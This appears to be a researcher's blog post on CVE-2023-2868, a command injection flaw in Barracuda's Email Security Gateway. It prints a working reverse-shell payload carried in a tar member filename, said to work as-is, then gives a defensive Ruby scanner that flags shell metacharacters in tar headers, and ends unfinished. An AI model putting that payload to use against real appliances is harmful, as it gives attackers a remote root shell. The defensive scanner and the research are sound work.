Some of my past research work involved crafting one of the first public proofs of concept for CVE-2023-2868, a command injection vulnerability in Barracuda’s Email Security Gateway appliance. My writeup can be found on AttackerKB, and my original Ruby PoC code can be found here.
CVE-2023-2868 is a command injection vulnerability in Barracuda ESG’s custom wrapper for amavisd. A .tar file in the following format would trigger RCE:

randomLetters.tar <- name of the tar file
- `setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect #{LHOST}:#{LPORT} >/tmp/p 2>/dev/null;rm /tmp/p"`
^ The filename of a subfile within the tar file; subfile contents are random.
This is a reconstruction of the details hinted at in Mandiant’s Blog, and works exactly as-is.
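Since the injection vector is the member filename inside the archive rather than the member contents, a defender can screen inbound .tar attachments by reading only the 512-byte tar headers and flagging any member name that carries shell metacharacters. The following Ruby is an added example written for this post; it is not the original PoC and not Barracuda's code. The metacharacter list, the minimal ustar header builder and the sample archive (with a harmless `echo marker` backtick name) are all constructed here for illustration.

```ruby
# Added example: scan a POSIX tar archive's headers (without extracting any
# member) and report member names containing shell metacharacters, the
# vector CVE-2023-2868 relied on. Everything below is constructed for this post.
require 'stringio'

BLOCK = 512
# Characters that should never appear in a benign attachment member name.
SUSPICIOUS = /[`$;|&<>]/

# Walk the archive header by header; returns the list of member names.
# Member data is skipped over, never interpreted.
def tar_member_names(bytes)
  names = []
  io = StringIO.new(bytes)
  loop do
    header = io.read(BLOCK)
    # End of archive: short read or an all-zero block.
    break if header.nil? || header.bytesize < BLOCK || header.bytes.all?(&:zero?)
    name = header.byteslice(0, 100).delete("\0").force_encoding('UTF-8')
    size = header.byteslice(124, 12).delete("\0").strip.to_i(8) # octal, per ustar
    names << name
    # Skip the member's data, which is padded to a whole number of blocks.
    io.seek(((size + BLOCK - 1) / BLOCK) * BLOCK, IO::SEEK_CUR)
  end
  names
end

# Names worth quarantining: anything matching the metacharacter set above.
def suspicious_members(bytes)
  tar_member_names(bytes).select { |n| n.match?(SUSPICIOUS) }
end

# --- Constructed sample archive so the scanner runs offline ---------------

# Build a minimal ustar header for a regular file.
def tar_header(name, size)
  h = ("\0" * BLOCK).b
  h[0, name.bytesize] = name.b          # name
  h[100, 8]  = "0000644\0"              # mode
  h[108, 8]  = "0000000\0"              # uid
  h[116, 8]  = "0000000\0"              # gid
  h[124, 12] = format("%011o\0", size)  # size (octal)
  h[136, 12] = format("%011o\0", 0)     # mtime
  h[156, 1]  = '0'                      # typeflag: regular file
  h[257, 6]  = "ustar\0"                # magic
  h[263, 2]  = '00'                     # version
  h[148, 8]  = ' ' * 8                  # checksum field counts as spaces
  h[148, 8]  = format("%06o\0 ", h.bytes.sum)
  h
end

def tar_entry(name, data)
  data = data.b
  pad = (BLOCK - data.bytesize % BLOCK) % BLOCK
  tar_header(name, data.bytesize) + data + ("\0" * pad)
end

# Constructed sample: one benign member, one member whose name carries
# backticks (a harmless marker, not the real payload), then end-of-archive.
SAMPLE_TAR = tar_entry('report.txt', 'hello') +
             tar_entry('x`echo marker`y.txt', 'random') +
             ("\0" * BLOCK * 2)

if __FILE__ == $PROGRAM_NAME
  puts "members:    #{tar_member_names(SAMPLE_TAR).inspect}"
  puts "suspicious: #{suspicious_members(SAMPLE_TAR).inspect}"
end
```

The scanner only ever parses fixed-offset header fields and seeks past member data, so it can sit in a mail pipeline ahead of any unpacking step; a hit on `suspicious_members` is a quarantine signal, and the archive is never handed to a shell.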
The vulnerability was patched in updates following the aforementioned blogs. However, for those who have an ESG appliance on their kitchen counter (lacking said security patches), CVE-2023-2868 can be used to get a root shell for further research. This post will explore that opportunity.
WIP